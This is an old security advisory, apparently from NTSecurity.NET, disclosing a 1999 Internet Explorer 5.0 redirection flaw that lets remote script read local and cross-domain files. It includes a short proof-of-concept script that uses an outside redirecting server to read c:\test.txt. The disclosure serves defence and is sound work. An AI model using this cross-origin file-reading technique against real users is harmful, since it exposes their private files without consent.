IE 5.0 Vulnerable to HTTP Redirection

Reported November 4, 1999 by Georgio Guninski
VERSIONS EFFECTED
  • Microsoft Internet Explorer 5.0

DESCRIPTION

Georgio Guninski discovered a problem with Internet Explorer 5.0 under Windows 95 and NT 4.0 (and perhaps Win98) that allows a remote user to read local text and HTML files and files from any domain. The reading of other file types may be possible as well, and window spoofing is also possible, as is reading files behind a firewall in some cases.

This vulnerability may be exploited using HTML email message or a newsgroup posting.

The problem is something like a race condition immediately after window.open("HTTP-redirecting-URL").

If you do:

     a=window.open("HTTP-redirecting-url");
     b=a.document;

Then you will have access to the redirected URL"s document using "b".

DEMONSTRATION

<SCRIPT>
alert("Create short text file c:\\test.txt and it will be read and shown in a message box");
a=window.open("http://www.nat.bg/~joro/reject.cgi?test.txt");
b=a.document;
setTimeout("alert(b.body.innerText);",4000);
</SCRIPT>

NOTE:  "

http://www.nat.bg/~joro/reject.cgi?test.txt" just does a HTTP redirect to: "file://c:/test.txt"

VENDOR RESPONSE

Microsoft is aware of the problem, however no response has been issued as of midday on November 4, 1999.

CREDITS
Reported by
Georgio Guninski
Posted here at NTSecurity.NET on November 4, 1999